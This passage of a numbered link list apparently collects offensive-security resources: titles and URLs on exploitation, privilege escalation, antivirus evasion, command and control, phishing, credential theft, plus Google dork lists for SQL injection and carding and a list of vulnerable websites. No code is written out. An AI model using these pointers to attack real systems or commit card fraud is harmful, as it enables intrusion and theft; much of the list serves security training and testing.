http://triton.quarkslab.com/blog/Code-coverage-using-dynamic-symbolic-execution/ -354-Triton (concolic execution framework) under the hood: http://triton.quarkslab.com/blog/first-approach-with-the-framework/ -355-- Stack and heap overflow detection at runtime via behavior analysis and Pin: http://shell-storm.org/blog/Stack-and-heap-overflow-detection-at-runtime-via-behavior-analysis-and-PIN/ -356-Binary analysis: Concolic execution with Pin and z3: http://shell-storm.org/blog/Binary-analysis-Concolic-execution-with-Pin-and-z3/ -357-In-Memory fuzzing with Pin: http://shell-storm.org/blog/In-Memory-fuzzing-with-Pin/ -358-Hackover 2015 r150 (outdated solving for Triton use cases): https://github.com/JonathanSalwan/Triton/blob/master/src/examples/python/ctf-writeups/hackover-ctf-2015-r150/solve.py -359-Skip sh – Web Application Security Scanner for XSS, SQL Injection, Shell injection: https://gbhackers.com/skipfish-web-application-security-scanner -360-Sublist3r – Tool for Penetration testers to Enumerate Sub-domains: https://gbhackers.com/sublist3r-penetration-testers -361-bypassing application whitelisting with bginfo: https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ -362-accessing-clipboard-from-the-lock-screen-in-windows-10: https://oddvar.moe/2017/01/24/accessing-clipboard-from-the-lock-screen-in-windows-10/ -363-bypassing-device-guard-umci-using-chm-cve-2017-8625: https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/ -364-defense-in-depth-writeup: https://oddvar.moe/2017/09/13/defense-in-depth-writeup/ -365-applocker-case-study-how-insecure-is-it-really-part-1: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ -366-empires-cross-platform-office-macro: https://www.blackhillsinfosec.com/empires-cross-platform-office-macro/ -367-recon tools: https://blackarch.org/recon.html -368-Black Hat 2018 tools list: https://medium.com/p/991fa38901da -369-Application Introspection & Hooking With Frida: https://www.fuzzysecurity.com/tutorials/29.html -370-And I did OSCP!: https://medium.com/p/589babbfea19 -371-CoffeeMiner: Hacking WiFi to inject cryptocurrency miner to HTML requests: https://arnaucube.com/blog/coffeeminer-hacking-wifi-cryptocurrency-miner.html -372-Most Important Endpoint Security & Threat Intelligence Tools List for Hackers and Security Professionals: https://gbhackers.com/threat-intelligence-tools -373-Penetration Testing Cheat Sheet For Windows Machine – Intrusion Detection: https://techincidents.com/penetration-testing-cheat-sheet/ -374-privilege escalation: https://toshellandback.com/category/privilege-escalation/ -375-The Complete List of Windows Post-Exploitation Commands (No Powershell): https://medium.com/p/999b5433b61e -376-The Art of Subdomain Enumeration: https://blog.sweepatic.com/tag/subdomain-enumeration/ -377-The Principles of a Subdomain Takeover: https://blog.sweepatic.com/subdomain-takeover-principles/ -378-The journey of Web Cache + Firewall Bypass to SSRF to AWS credentials compromise!: https://medium.com/p/b250fb40af82 -379-The Solution for Web for Pentester-I: https://medium.com/p/4c21b3ae9673 -380-The Ultimate Penetration Testing Command Cheat Sheet for Linux: https://www.hackingloops.com/command-cheat-sheet-for-linux/ -381-: Ethical Hacking, Hack Tools, Hacking Tricks, Information Gathering, Penetration Testing, Recommended: https://www.hackingloops.com/hacking-tricks/ -383-Introduction to Exploitation, Part 1: Introducing Concepts and Terminology: https://www.hackingloops.com/exploitation-terminology/ -384-How Hackers Kick Victims Off of Wireless Networks: https://www.hackingloops.com/kick-victims-off-of-wireless-networks/ -385-Maintaining Access Part 1: Introduction and Metasploit Example: https://www.hackingloops.com/maintaining-access-metasploit/ -386-How to Steal Windows Credentials with Mimikatz and Metasploit: https://www.hackingloops.com/mimikatz/ -387-Evading Anti-virus Part 2: Obfuscating Payloads with Msfvenom: https://www.hackingloops.com/msfvenom/ -388-Evading Anti-virus Part 1: Infecting EXEs with Shellter: https://www.hackingloops.com/evading-anti-virus-shellter/ -389-Mobile Hacking Part 4: Fetching Payloads via USB Rubber Ducky: https://www.hackingloops.com/payloads-via-usb-rubber-ducky/ -390-Ethical Hacking Practice Test 6 – Footprinting Fundamentals Level1: https://www.hackingloops.com/ethical-hacking-practice-test-6-footprinting-fundamentals-level1/ -391-Skip Cracking Responder Hashes and Relay Them: https://threat.tevora.com/quick-tip-skip-cracking-responder-hashes-and-replay-them/ -392-Cracking NTLMv1 Handshakes with Crack.sh: http://threat.tevora.com/quick-tip-crack-ntlmv1-handshakes-with-crack-sh/ -393-Top 3 Anti-Forensic OpSec Tips for Linux & A New Dead Man’s Switch: https://medium.com/p/d5e92843e64a -394-VNC Penetration Testing (Port 5901): http://www.hackingarticles.in/vnc-penetration-testing -395-Windows Privilege Escalation: http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation -396-Removing Sender’s IP Address From Email’s Received: From Header: https://www.devside.net/wamp-server/removing-senders-ip-address-from-emails-received-from-header -397-Dump Cleartext Password in Linux PC using MimiPenguin: http://www.hackingarticles.in/dump-cleartext-password-linux-pc-using-mimipenguin -398-Embedded Backdoor with Image using FakeImageExploiter: http://www.hackingarticles.in/embedded-backdoor-image-using-fakeimageexploiter -399-Exploit Command Injection Vulnearbility with Commix and Netcat: http://www.hackingarticles.in/exploit-command-injection-vulnearbility-commix-netcat -400-Exploiting Form Based Sql Injection using Sqlmap: http://www.hackingarticles.in/exploiting-form-based-sql-injection-using-sqlmap -401-Beginner Guide to impacket Tool kit: http://www.hackingarticles.in/beginner-guide-to-impacket-tool-kit -402-Best of Post Exploitation Exploits & Tricks: http://www.hackingarticles.in/best-of-post-exploitation-exploits-tricks -403-Command Injection to Meterpreter using Commix: http://www.hackingarticles.in/command-injection-meterpreter-using-commix -404-Comprehensive Guide to Crunch Tool: http://www.hackingarticles.in/comprehensive-guide-to-crunch-tool -405-Compressive Guide to File Transfer (Post Exploitation): http://www.hackingarticles.in/compressive-guide-to-file-transfer-post-exploitation -406-Crack Wifi Password using Aircrack-Ng (Beginner’s Guide): http://www.hackingarticles.in/crack-wifi-password-using-aircrack-ng -407-How to Detect Meterpreter in Your PC: http://www.hackingarticles.in/detect-meterpreter-pc -408-Easy way to Hack Database using Wizard switch in Sqlmap: http://www.hackingarticles.in/easy-way-hack-database-using-wizard-switch-sqlmap -409-Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn): http://www.hackingarticles.in/exploiting-webserver-using-sqlmap-metasploit-os-pwn -410-Create SSL Certified Meterpreter Payload using MPM: http://www.hackingarticles.in/exploit-remote-pc-ssl-certified-meterpreter-payload-using-mpm -411-Port forwarding: A practical hands-on guide: https://www.abatchy.com/2017/01/port-forwarding-practical-hands-on-guide -412-Exploit Dev 101: Jumping to Shellcode: https://www.abatchy.com/2017/05/jumping-to-shellcode.html -413-Introduction to Manual Backdooring: https://www.abatchy.com/2017/05/introduction-to-manual-backdooring_24.html -414-Kernel Exploitation: https://www.abatchy.com/2018/01/kernel-exploitation-1 -415-Exploit Dev 101: Bypassing ASLR on Windows: https://www.abatchy.com/2017/06/exploit-dev-101-bypassing-aslr-on.html -416-Shellcode reduction tips (x86): https://www.abatchy.com/2017/04/shellcode-reduction-tips-x86 -417-OSCE Study Plan: https://www.abatchy.com/2017/03/osce-study-plan -418-[DefCamp CTF Qualification 2017] Don't net, kids! (Revexp 400): https://www.abatchy.com/2017/10/defcamp-dotnot -419-DRUPAL 7.X SERVICES MODULE UNSERIALIZE() TO RCE: https://www.ambionics.io/ -420-SQL VULNERABLE WEBSITES LIST 2017 [APPROX 2500 FRESH SQL VULNERABLE SITES]: https://www.cityofhackerz.com/sql-vulnerable-websites-list-2017 -421-Windows IR Live Forensics Cheat Sheet: https://www.cheatography.com/tag/forensics/ -422-windows-kernel-logic-bug-class-access: https://googleprojectzero.blogspot.com/2019/03/windows-kernel-logic-bug-class-access.html -423-injecting-code-into-windows-protected: https://googleprojectzero.blogspot.com/2018/11/injecting-code-into-windows-protected.html -424-USING THE DDE ATTACK WITH POWERSHELL EMPIRE: https://1337red.wordpress.com/using-the-dde-attack-with-powershell-empire -425-Automated Derivative Administrator Search: https://wald0.com/?p=14 -426-A Red Teamer’s Guide to GPOs and OUs: https://wald0.com/?p=179 -427-Pen Testing and Active Directory, Part VI: The Final Case: https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/ -428-Offensive Tools and Techniques: https://www.sec.uno/2017/03/01/offensive-tools-and-techniques/ -429-Three penetration testing tips to out-hack hackers: http://infosechotspot.com/three-penetration-testing-tips-to-out-hack-hackers-betanews/ -430-Introducing BloodHound: https://wald0.com/?p=68 -431-Red + Blue = Purple: http://www.blackhillsinfosec.com/?p=5368 -432-Active Directory Access Control List – Attacks and Defense – Enterprise Mobility and Security Blog: https://blogs.technet.microsoft.com/enterprisemobility/2017/09/18/active-directory-access-control-list-attacks-and-defense/ -433-PrivEsc: Unquoted Service Path: https://www.gracefulsecurity.com/privesc-unquoted-service-path/ -434-PrivEsc: Insecure Service Permissions: https://www.gracefulsecurity.com/privesc-insecure-service-permissions/ -435-PrivEsc: DLL Hijacking: https://www.gracefulsecurity.com/privesc-dll-hijacking/ -436-Android Reverse Engineering 101 – Part 1: http://www.fasteque.com/android-reverse-engineering-101-part-1/ -437-Luckystrike: An Evil Office Document Generator: https://www.shellntel.com/blog/2016/9/13/luckystrike-a-database-backed-evil-macro-generator -438-the-number-one-pentesting-tool-youre-not-using: https://www.shellntel.com/blog/2016/8/3/the-number-one-pentesting-tool-youre-not-using -439-uac-bypass: http://www.securitynewspaper.com/tag/uac-bypass/ -440-XSSer – Automated Framework Tool to Detect and Exploit XSS vulnerabilities: https://gbhackers.com/xsser-automated-framework-detectexploit-report-xss-vulnerabilities -441-Penetration Testing on X11 Server: http://www.hackingarticles.in/penetration-testing-on-x11-server -442-Always Install Elevated: https://pentestlab.blog/2017/02/28/always-install-elevated -443-Scanning for Active Directory Privileges & Privileged Accounts: https://adsecurity.org/?p=3658 -444-Windows Server 2016 Active Directory Features: https://adsecurity.org/?p=3646 -445-powershell: https://adsecurity.org/?tag=powershell -446-PowerShell Security: PowerShell Attack Tools, Mitigation, & Detection: https://adsecurity.org/?p=2921 -447-DerbyCon 6 (2016) Talk – Attacking EvilCorp: Anatomy of a Corporate Hack: https://adsecurity.org/?p=3214 -448-Real-World Example of How Active Directory Can Be Compromised (RSA Conference Presentation): https://adsecurity.org/?p=2085 -449-Advanced ATM Penetration Testing Methods: https://gbhackers.com/advanced-atm-penetration-testing-methods -450-Background: Microsoft Ofice Exploitation: https://rhinosecuritylabs.com/research/abusing-microsoft-word-features-phishing-subdoc/ -451-Automated XSS Finder: https://medium.com/p/4236ed1c6457 -452-Application whitelist bypass using XLL and embedded shellcode: https://rileykidd.com/.../application-whitelist-bypass-using-XLL-and-embedded-shellc -453-AppLocker Bypass – Regsvr32: https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32 -454-Nmap Scans using Hex Value of Flags: http://www.hackingarticles.in/nmap-scans-using-hex-value-flags -455-Nmap Scan with Timing Parameters: http://www.hackingarticles.in/nmap-scan-with-timing-parameters -456-OpenSSH User Enumeration Time- Based Attack with Osueta: http://www.hackingarticles.in/openssh-user-enumeration-time-based-attack-osueta -457-Penetration Testing: http://www.hackingarticles.in/web-penetration-testing/ -458-Penetration Testing on Remote Desktop (Port 3389): http://www.hackingarticles.in/penetration-testing-remote-desktop-port-3389 -459-Penetration Testing on Telnet (Port 23): http://www.hackingarticles.in/penetration-testing-telnet-port-23 -460-Penetration Testing in Windows/Active Directory with Crackmapexec: http://www.hackingarticles.in/penetration-testing-windowsactive-directory-crackmapexec -461-Penetration Testing in WordPress Website using WordPress Exploit Framework: http://www.hackingarticles.in/penetration-testing-wordpress-website-using-wordpress-exploit-framework -462-Port Scanning using Metasploit with IPTables: http://www.hackingarticles.in/port-scanning-using-metasploit-iptables -463-Post Exploitation Using WMIC (System Command): http://www.hackingarticles.in/post-exploitation-using-wmic-system-command -464-Privilege Escalation in Linux using etc/passwd file: http://www.hackingarticles.in/privilege-escalation-in-linux-using-etc-passwd-file -465-RDP Pivoting with Metasploit: http://www.hackingarticles.in/rdp-pivoting-metasploit -466-A New Way to Hack Remote PC using Xerosploit and Metasploit: http://www.hackingarticles.in/new-way-hack-remote-pc-using-xerosploit-metasploit -467-Shell to Meterpreter using Session Command: http://www.hackingarticles.in/shell-meterpreter-using-session-command -468-SMTP Pentest Lab Setup in Ubuntu (Port 25): http://www.hackingarticles.in/smtp-pentest-lab-setup-ubuntu -469-SNMP Lab Setup and Penetration Testing: http://www.hackingarticles.in/snmp-lab-setup-and-penetration-testing -470-SQL Injection Exploitation in Multiple Targets using Sqlmap: http://www.hackingarticles.in/sql-injection-exploitation-multiple-targets-using-sqlmap -471-Sql Injection Exploitation with Sqlmap and Burp Suite (Burp CO2 Plugin): http://www.hackingarticles.in/sql-injection-exploitation-sqlmap-burp-suite-burp-co2-plugin -472-SSH Penetration Testing (Port 22): http://www.hackingarticles.in/ssh-penetration-testing-port-22 -473-Manual Post Exploitation on Windows PC (System Command): http://www.hackingarticles.in/manual-post-exploitation-windows-pc-system-command -474-SSH Pivoting using Meterpreter: http://www.hackingarticles.in/ssh-pivoting-using-meterpreter -475-Stealing Windows Credentials of Remote PC with MS Office Document: http://www.hackingarticles.in/stealing-windows-credentials-remote-pc-ms-office-document -476-Telnet Pivoting through Meterpreter: http://www.hackingarticles.in/telnet-pivoting-meterpreter -477-Hack Password using Rogue Wi-Fi Access Point Attack (WiFi-Pumpkin): http://www.hackingarticles.in/hack-password-using-rogue-wi-fi-access-point-attack-wifi-pumpkin -478-Hack Remote PC using Fake Updates Scam with Ettercap and Metasploit: http://www.hackingarticles.in/hack-remote-pc-using-fake-updates-scam-with-ettercap-and-metasploit -479-Hack Remote Windows 10 Password in Plain Text using Wdigest Credential Caching Exploit: http://www.hackingarticles.in/hack-remote-windows-10-password-plain-text-using-wdigest-credential-caching-exploit -480-Hack Remote Windows 10 PC using TheFatRat: http://www.hackingarticles.in/hack-remote-windows-10-pc-using-thefatrat -481-2 Ways to Hack Windows 10 Password Easy Way: http://www.hackingarticles.in/hack-windows-10-password-easy-way -482-How to Change ALL Files Extension in Remote PC (Confuse File Extensions Attack): http://www.hackingarticles.in/how-to-change-all-files-extension-in-remote-pc-confuse-file-extensions-attack -483-How to Delete ALL Files in Remote Windows PC: http://www.hackingarticles.in/how-to-delete-all-files-in-remote-windows-pc-2 -484-How to Encrypt Drive of Remote Victim PC: http://www.hackingarticles.in/how-to-encrypt-drive-of-remote-victim-pc -485-Post Exploitation in Linux With Metasploit: https://pentestlab.blog/2013/01/04/post-exploitation-in-linux-with-metasploit -486-Red Team: https://posts.specterops.io/tagged/red-team?source=post -487-Code Signing Certi cate Cloning Attacks and Defenses: https://posts.specterops.io/tagged/code-signing?source=post -488-Phishing: https://posts.specterops.io/tagged/phishing?source=post -489-PowerPick – A ClickOnce Adjunct: http://www.sixdub.net/?p=555 -490-sql-injection-xss-playground: https://ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground -491-Privilege Escalation & Post-Exploitation: https://github.com/rmusser01/Infosec_Reference/raw/master/Draft/Privilege%20Escalation%20%26%20Post-Exploitation.md -492-https-payload-and-c2-redirectors: https://posts.specterops.io/https-payload-and-c2-redirectors-ff8eb6f87742?source=placement_card_footer_grid---------2-41 -493-a-push-toward-transparency: https://posts.specterops.io/a-push-toward-transparency-c385a0dd1e34?source=placement_card_footer_grid---------0-41 -494-bloodhound: https://posts.specterops.io/tagged/bloodhound?source=post -495-active directory: https://posts.specterops.io/tagged/active-directory?source=post -496-Load & Execute Bundles with migrationTool: https://posts.specterops.io/load-execute-bundles-with-migrationtool-f952e276e1a6?source=placement_card_footer_grid---------1-41 -497-Outlook Forms and Shells: https://sensepost.com/blog/2017/outlook-forms-and-shells/ -498-Tools: https://sensepost.com/blog/tools/ -499-2018 pentesting resources: https://sensepost.com/blog/2018/ -500-network pentest: https://securityonline.info/category/penetration-testing/network-pentest/ -501-[technical] Pen-testing resources: https://medium.com/p/cd01de9036ad -502-Stored XSS on Facebook: https://opnsec.com/2018/03/stored-xss-on-facebook/ -503-vulnerabilities: https://www.brokenbrowser.com/category/vulnerabilities/ -504-Extending BloodHound: Track and Visualize Your Compromise: https://porterhau5.com/.../extending-bloodhound-track-and-visualize-your-compromise -505-so-you-want-to-be-a-web-security-researcher: https://portswigger.net/blog/so-you-want-to-be-a-web-security-researcher -506-BugBounty — AWS S3 added to my “Bucket” list!: https://medium.com/p/f68dd7d0d1ce -507-BugBounty — API keys leakage, Source code disclosure in India’s largest e-commerce health care company: https://medium.com/p/c75967392c7e -508-BugBounty — Exploiting CRLF Injection can lands into a nice bounty: https://medium.com/p/159525a9cb62 -509-BugBounty — How I was able to bypass rewall to get RCE and then went from server shell to get root user account: https://medium.com/p/783f71131b94 -510-BugBounty — “I don’t need your current password to login into youraccount” - How could I completely takeover any user’s account in an online classi ed ads company: https://medium.com/p/e51a945b083d -511-Ping Power — ICMP Tunnel: https://medium.com/bugbountywriteup/ping-power-icmp-tunnel-31e2abb2aaea?source=placement_card_footer_grid---------1-41 -512-hacking: https://www.nextleveltricks.com/hacking/ -513-Top 8 Best YouTube Channels To Learn Ethical Hacking Online !: https://www.nextleveltricks.com/youtube-channels-to-learn-hacking/ -514-Google Dorks List 2018 | Fresh Google Dorks 2018 for SQLi: https://www.nextleveltricks.com/latest-google-dorks-list/ -515-Art of Shellcoding: Basic AES Shellcode Crypter: http://www.nipunjaswal.com/2018/02/shellcode-crypter.html -516-Big List Of Google Dorks Hacking: https://xspiyr.wordpress.com/2012/09/05/big-list-of-google-dorks-hacking/ -517-nmap-cheatsheet: https://bitrot.sh/cheatsheet/09-12-2017-nmap-cheatsheet/ -518-Aws Recon: https://enciphers.com/tag/aws-recon/ -519-Recon: https://enciphers.com/tag/recon/ -520-Subdomain Enumeration: https://enciphers.com/tag/subdomain-enumeration/ -521-Shodan: https://enciphers.com/tag/shodan/ -522-Dump LAPS passwords with ldapsearch: https://malicious.link/post/2017/dump-laps-passwords-with-ldapsearch/ -523-peepdf - PDF Analysis Tool: http://eternal-todo.com/tools/peepdf-pdf-analysis-tool -524-Evilginx 2 - Next Generation of Phishing 2FA Tokens: breakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokens/ -526-Evil XML with two encodings: https://mohemiv.com/all/evil-xml/ -527-create-word-macros-with-powershell: https://4sysops.com/archives/create-word-macros-with-powershell/ -528-Excess XSS A comprehensive tutorial on cross-site scripting: https://excess-xss.com/ -529-Executing Commands and Bypassing AppLocker with PowerShell Diagnostic Scripts: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ -530-Abusing DCOM For Yet Another Lateral Movement Technique: https://bohops.com/2018/04/28/abusing-dcom-for-yet-another-lateral-movement-technique/ -531-Trust Direction: An Enabler for Active Directory Enumeration and Trust Exploitation: https://bohops.com/2017/12/02/trust-direction-an-enabler-for-active-directory-enumeration-and-trust-exploitation/ -532-Abusing DCOM For Yet Another Lateral Movement Technique: https://bohops.com/2018/04/28/abusing-dcom-for-yet-another-lateral-movement-technique/ -533-“Practical recon techniques for bug hunters & pen testers”: https://blog.appsecco.com/practical-recon-techniques-for-bug-hunters-pen-testers-at-levelup-0x02-b72c15641972?source=placement_card_footer_grid---------2-41 -534-Exploiting Node.js deserialization bug for Remote Code Execution: https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/ -535-Exploiting System Shield AntiVirus Arbitrary Write Vulnerability using SeTakeOwnershipPrivilege: http://www.greyhathacker.net/?p=1006 -536-Running Macros via ActiveX Controls: http://www.greyhathacker.net/?p=948 -537-all=BUG+MALWARE+EXPLOITS http://www.greyhathacker.net/?cat=18 -538-“FILELESS” UAC BYPASS USING EVENTVWR.EXE AND: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking -539-BYPASSING UAC ON WINDOWS 10 USING DISK CLEANUP: https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/ -540-A Look at CVE-2017-8715: Bypassing CVE-2017-0218 using PowerShell Module Manifests: https://enigma0x3.net/2017/11/06/a-look-at-cve-2017-8715-bypassing-cve-2017-0218-using-powershell-module-manifests/ -541-“FILELESS” UAC BYPASS USING SDCLT.EXE: https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe -542-File Upload XSS: https://medium.com/p/83ea55bb9a55 -543-Firebase Databases: https://medium.com/p/f651a7d49045 -544-Safe Red Team Infrastructure: https://medium.com/@malcomvetter/safe-red-team-infrastructure-c5d6a0f13fac -545-RED-TEAM: https://cybersyndicates.com/tags/red-team/ -546-Egressing Bluecoat with Cobaltstike & Let's Encrypt: https://www.youtube.com/watch?v=cgwfjCmKQwM -547-Veil-Evasion: https://cybersyndicates.com/tags/veil-evasion/ -548-Dangerous Virus For Windows Crashes Everything Hack window Using Virus: http://thelearninghacking.com/create-virus-hack-windows/ -549-Download Google Dorks List 2019: https://medium.com/p/323c8067502c -550-Don’t leak sensitive data via security scanning tools: https://medium.com/p/7d1f715f0486 -551-CRLF Injection Into PHP’s cURL Options: https://medium.com/@tomnomnom/crlf-injection-into-phps-curl-options-e2e0d7cfe545?source=placement_card_footer_grid---------0-60 -552-Open Redirects & Security Done Right!: https://medium.com/@AkshaySharmaUS/open-redirects-security-done-right-e524a3185496?source=placement_card_footer_grid---------2-60 -553-DOM XSS – auth.uber.com: https://stamone-bug-bounty.blogspot.com/2017/10/dom-xss-auth_14.html -554-PowerPoint and Custom Actions: https://cofense.com/powerpoint-and-custom-actions/ -555-exploiting-adobe-coldfusion: https://codewhitesec.blogspot.com/2018/03/exploiting-adobe-coldfusion.html -556-Command and Control – HTTPS: https://pentestlab.blog/2017/10/04/command-and-control-https -557-Command and Control – Images: https://pentestlab.blog/2018/01/02/command-and-control-images -558-Command and Control – JavaScript: https://pentestlab.blog/2018/01/08/command-and-control-javascript -559-XSS-Payloads: https://github.com/Pgaijin66/XSS-Payloads -560-Command and Control – Web Interface: https://pentestlab.blog/2018/01/03/command-and-control-web-interface -561-Command and Control – Website: https://pentestlab.blog/2017/11/14/command-and-control-website -562-Command and Control – WebSocket: https://pentestlab.blog/2017/12/06/command-and-control-websocket -563-atomic-red-team: https://github.com/redcanaryco/atomic-red-team -564-PowerView-3.0-tricks.ps1: https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 -565-awesome-sec-talks: https://github.com/PaulSec/awesome-sec-talks -566-Awesome-Red-Teaming: https://github.com/yeyintminthuhtut/Awesome-Red-Teaming -567-awesome-php: https://github.com/ziadoz/awesome-php -568-latest-hacks: https://hackercool.com/latest-hacks/ -569-GraphQL NoSQL Injection Through JSON Types: http://www.east5th.co/blog/2017/06/12/graphql-nosql-injection-through-json-types/ -570-Writing .NET Executables for Pentesters: https://www.peew.pw/blog/2017/12/4/writing-net-executables-for-penteters-part-2 -571-A curated list of fuzzing resources ( Books, courses - free and paid, videos, tools, tutorials and vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Development like root cause analysis. https://github.com/secfigo/Awesome-Fuzzing -572-How to Shutdown, Restart, Logoff, and Hibernate Remote Windows PC: http://www.hackingarticles.in/how-to-shutdown-restart-logoff-and-hibernate-remote-windows-pc -572-Injecting Metasploit Payloads into Android Applications – Manually: https://pentestlab.blog/2017/06/26/injecting-metasploit-payloads-into-android-applications-manually -573-Google Dorks For Carding [Huge List] - Part 1: https://hacker-arena.blogspot.com/2014/03/google-dorks-for-carding-huge-list-part.html -574-Google dorks for growth hackers: https://medium.com/p/7f83c8107057 -575-Google Dorks For Carding (HUGE LIST): https://leetpedia.blogspot.com/2013/01/google-dorks-for-carding-huge-list.html -576-BIGGEST SQL Injection Dorks List ~ 20K+ Dorks: https://leetpedia.blogspot.com/2013/05/biggest-sql-injection-dorks-list-20k.html -577-Pastebin Accounts Hacking (Facebook/Paypal/LR/Gmail/Yahoo, etc): https://leetpedia.blogspot.com/2013/01/pastebin-accounts-hacking.html -578-How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!: http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html -579-Hijacking VNC (Enum, Brute, Access and Crack): https://medium.com/p/d3d18a4601cc -580-Linux Post Exploitation Command List: https://github.com/mubix/post-exploitation/wiki -581-List of google dorks for sql injection: https://deadlyhacker.wordpress.com/2013/05/09/list-of-google-dorks-for-sql-injection/ -582-Microsoft Office – NTLM Hashes via Frameset: https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset -583-Microsoft Windows 10 - Child Process Restriction Mitigation Bypass: https://www.exploit-db.com/download/44888.txt -584-Microsoft Windows CVE-2018-8210 Remote Code Execution Vulnerability: https://www.securityfocus.com/bid/104407 -585-Microsoft Windows Kernel CVE-2018-0982 Local Privilege Escalation Vulnerability: https://www.securityfocus.com/bid/104382 -586-miSafes Mi-Cam Device Hijacking: https://packetstormsecurity.com/files/146504/SA-20180221-0.txt -587-Low-Level Windows API Access From PowerShell: https://www.fuzzysecurity.com/tutorials/24.html -588-Linux Kernel 'mm/hugetlb.c' Local Denial of Service Vulnerability: https://www.securityfocus.com/bid/103316 -589-Lateral Movement – RDP: https://pentestlab.blog/2018/04/24/lateral-movement-rdp/ -590-Snagging creds from locked machines: https://malicious.link/post/2016/snagging-creds-from-locked-machines/ -591-Making a Blind SQL Injection a Little Less Blind: https://medium.com/p/428dcb614ba8 -592-VulnHub — Kioptrix: Level 5: https://medium.com/@bondo.mike/vulnhub-kioptrix-level-5-88ab65146d48?source=placement_card_footer_grid---------1-60 -593-Unauthenticated Account Takeover Through HTTP Leak: https://medium.com/p/33386bb0ba0b -594-Hakluke’s Ultimate OSCP Guide: Part 1 — Is OSCP for you?: https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-1-is-oscp-for-you-b57cbcce7440?source=placement_card_footer_grid---------2-43 -595-Finding Target-relevant Domain Fronts: https://medium.com/@vysec.private/finding-target-relevant-domain-fronts-7f4ad216c223?source=placement_card_footer_grid---------0-44 -596-Safe Red Team Infrastructure: https://medium.com/@malcomvetter/safe-red-team-infrastructure-c5d6a0f13fac?source=placement_card_footer_grid---------1-60 -597-Cobalt Strike Visualizations: https://medium.com/@001SPARTaN/cobalt-strike-visualizations-e6a6e841e16b?source=placement_card_footer_grid---------2-60 -598-OWASP Top 10 2017 — Web Application Security Risks: https://medium.com/p/31f356491712 -599-XSS-Auditor — the protector of unprotected: https://medium.com/bugbountywriteup/xss-auditor-the-protector-of-unprotected-f900a5e15b7b?source=placement_card_footer_grid---------0-60 -600-Netcat vs Cryptcat – Remote Shell to Control Kali Linux from Windows machine: https://gbhackers.com/netcat-vs-cryptcat -601-Jenkins Servers Infected With Miner.: https://medium.com/p/e370a900ab2e -602-cheat-sheet: http://pentestmonkey.net/category/cheat-sheet -603-Command and Control – Website Keyword: https://pentestlab.blog/2017/09/14/command-and-control-website-keyword/ -604-Command and Control – Twitter: https://pentestlab.blog/2017/09/26/command-and-control-twitter/ -605-Command and Control – Windows COM: https://pentestlab.blog/2017/09/01/command-and-control-windows-com/ -606-Microsoft Office – NTLM Hashes via Frameset: https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset/ -607-PHISHING AGAINST PROTECTED VIEW: https://enigma0x3.net/2017/07/13/phishing-against-protected-view/ -608-PHISHING WITH EMPIRE: https://enigma0x3.net/2016/03/15/phishing-with-empire/ -609-Reverse Engineering Android Applications: https://pentestlab.blog/2017/02/06/reverse-engineering-android-applications/ -610-HTML Injection: https://pentestlab.blog/2013/06/26/html-injection/ -611-Meterpreter stage AV/IDS evasion with powershell: https://arno0x0x.wordpress.com/2016/04/13/meterpreter-av-ids-evasion-powershell/ -612-Windows Atomic Tests by ATT&CK Tactic & Technique: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/windows-index.md -613-Windows Active Directory Post Exploitation Cheatsheet: https://medium.com/p/48c2bd70388 -614-Windows 10 UAC Loophole Can Be Used to Infect Systems with Malware: http://news.softpedia.com/news/windows-10-uac-loophole-can-be-used-to-infect-systems-with-malware-513996.shtml -615-How to Bypass Anti-Virus to Run Mimikatz: https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/ -616-Userland API Monitoring and Code Injection Detection: https://0x00sec.org/t/userland-api-monitoring-and-code-injection-detection/5565 -617-USE TOR. USE EMPIRE.: http://secureallthethings.blogspot.com/2016/11/use-tor-use-empire.html -617-ADVANCED CROSS SITE SCRIPTING (XSS) CHEAT SHEET: https://www.muhaddis.info/advanced-cross-site-scripting-xss-cheat-sheet/ -618-Empire without PowerShell.exe: https://bneg.io/2017/07/26/empire-without-powershell-exe/ -619-RED TEAM: https://bneg.io/category/red-team/ -620-PDF Tools: https://blog.didierstevens.com/programs/pdf-tools/ -621-DNS Data ex ltration — What is this and How to use? https://blog.fosec.vn/dns-data-exfiltration-what-is-this-and-how-to-use-2f6c69998822 -621-Google Dorks: https://medium.com/p/7cfd432e0cf3 -622-Hacking with JSP Shells: https://blog.netspi.com/hacking-with-jsp-shells/ -623-Malware Analysis: https://github.com/RPISEC/Malware/raw/master/README.md -624-A curated list of Capture The Flag (CTF) frameworks, libraries, resources and softwares.: https://github.com/SandySekharan/CTF-tool -625-Group Policy Preferences: https://pentestlab.blog/2017/03/20/group-policy-preferences -627-CHECKING FOR MALICIOUSNESS IN AC OFORM OBJECTS ON PDF FILES: https://furoner.wordpress.com/2017/11/15/checking-for-maliciousness-in-acroform-objects-on-pdf-files -628-deobfuscation: https://furoner.wordpress.com/tag/deobfuscation/ -629-POWERSHELL EMPIRE STAGERS 1: PHISHING WITH AN OFFICE MACRO AND EVADING AVS: https://fzuckerman.wordpress.com/2016/10/06/powershell-empire-stagers-1-phishing-with-an-office-macro-and-evading-avs/ 